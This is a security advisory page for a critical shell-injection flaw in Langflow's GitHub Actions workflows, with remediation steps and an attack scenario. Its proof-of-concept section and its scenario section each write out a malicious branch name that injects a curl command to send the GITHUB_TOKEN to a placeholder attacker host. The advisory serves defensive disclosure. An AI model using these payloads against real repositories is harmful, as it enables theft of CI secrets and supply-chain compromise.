CVE-2026-33475
CRITICALLangflow's GitHub Actions CI/CD pipeline has a critical unauthenticated shell injection flaw (CVSS 9.1) exploitable by any GitHub user with fork access via a maliciously named pull request branch. Update to Langflow v1.9.0 immediately and verify the integrity of any Langflow artifacts (PyPI packages, container images) consumed from the affected window. Audit all internal GitHub Actions workflows for unquoted ${{ github.* }} interpolation in run: steps — this class of vulnerability is endemic across AI/ML open-source repos.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| langflow | pip | — | No patch |
Do you use langflow? You're affected.
Severity & Risk
Recommended Action
- 1. Patch: Update Langflow to v1.9.0. 2. Audit: Search all GitHub Actions workflows for direct ${{ github.head_ref }}, ${{ github.event.pull_request.title }}, and ${{ inputs.* }} interpolation inside run: blocks — use CodeQL or Semgrep rule 'github-actions-injection'. 3. Remediate: Move context values to env: variables (env: BRANCH: ${{ github.head_ref }}) and reference $BRANCH in run: steps. 4. Harden: Restrict GITHUB_TOKEN permissions to minimum required (contents: read, packages: none) via permissions: blocks. 5. Verify: For orgs consuming Langflow, validate checksums of installed packages from the pre-1.9.0 window against known-good hashes. 6. Detect: Instrument CI runners to alert on unexpected outbound HTTP/DNS requests; review GitHub Actions audit logs for anomalous token usage from the affected period.
Classification
Compliance Impact
This CVE is relevant to:
Technical Details
NVD Description
Langflow is a tool for building and deploying AI-powered agents and workflows. An unauthenticated remote shell injection vulnerability exists in multiple GitHub Actions workflows in the Langflow repository prior to version 1.9.0. Unsanitized interpolation of GitHub context variables (e.g., `${{ github.head_ref }}`) in `run:` steps allows attackers to inject and execute arbitrary shell commands via a malicious branch name or pull request title. This can lead to secret exfiltration (e.g., `GITHUB_TOKEN`), infrastructure manipulation, or supply chain compromise during CI/CD execution. Version 1.9.0 patches the vulnerability. --- ### Details Several workflows in `.github/workflows/` and `.github/actions/` reference GitHub context variables directly in `run:` shell commands, such as: ```yaml run: | validate_branch_name "${{ github.event.pull_request.head.ref }}" ``` Or: ```yaml run: npx playwright install ${{ inputs.browsers }} --with-deps ``` Since `github.head_ref`, `github.event.pull_request.title`, and custom `inputs.*` may contain **user-controlled values**, they must be treated as **untrusted input**. Direct interpolation without proper quoting or sanitization leads to shell command injection. --- ### PoC 1. **Fork** the Langflow repository 2. **Create a new branch** with the name: ```bash injection-test && curl https://attacker.site/exfil?token=$GITHUB_TOKEN ``` 3. **Open a Pull Request** to the main branch from the new branch 4. GitHub Actions will run the affected workflow (e.g., `deploy-docs-draft.yml`) 5. The `run:` step containing: ```yaml echo "Branch: ${{ github.head_ref }}" ``` Will execute: ```bash echo "Branch: injection-test" curl https://attacker.site/exfil?token=$GITHUB_TOKEN ``` 6. The attacker receives the CI secret via the exfil URL. --- ### Impact - **Type:** Shell Injection / Remote Code Execution in CI - **Scope:** Any public Langflow fork with GitHub Actions enabled - **Impact:** Full access to CI secrets (e.g., `GITHUB_TOKEN`), possibility to push malicious tags or images, tamper with releases, or leak sensitive infrastructure data --- ### Suggested Fix Refactor affected workflows to **use environment variables** and wrap them in **double quotes**: ```yaml env: BRANCH_NAME: ${{ github.head_ref }} run: | echo "Branch is: \"$BRANCH_NAME\"" ``` Avoid direct `${{ ... }}` interpolation inside `run:` for any user-controlled value. --- ### Affected Files (Langflow `1.3.4`) - `.github/actions/install-playwright/action.yml` - `.github/workflows/deploy-docs-draft.yml` - `.github/workflows/docker-build.yml` - `.github/workflows/release_nightly.yml` - `.github/workflows/python_test.yml` - `.github/workflows/typescript_test.yml`
Exploitation Scenario
An adversary targeting an AI/ML team's Langflow-based LLM agent pipeline forks the Langflow repository and creates a branch named 'fix/docs && curl https://attacker.com/x?t=$GITHUB_TOKEN && echo'. They open a PR triggering deploy-docs-draft.yml; the workflow's run: step echo "Branch: ${{ github.head_ref }}" resolves to the injected payload and executes it, sending the GITHUB_TOKEN out-of-band. The adversary authenticates to GitHub with the token, pushes a backdoored release tag with a modified langflow Python package containing a persistent reverse shell, and publishes it to PyPI. Organizations with auto-update enabled in their LLM agent CI pipelines pull the compromised version on next build, granting the adversary RCE inside production AI infrastructure — potentially including access to model weights, vector databases, and inference endpoints.
Weaknesses (CWE)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N References
- github.com/langflow-ai/langflow/security/advisories/GHSA-87cc-65ph-2j4w
- github.com/langflow-ai/langflow/security/advisories/GHSA-87cc-65ph-2j4w
- github.com/langflow-ai/langflow/security/advisories/GHSA-87cc-65ph-2j4w Exploit Mitigation Vendor
- github.com/langflow-ai/langflow/security/advisories/GHSA-87cc-65ph-2j4w Exploit Mitigation Vendor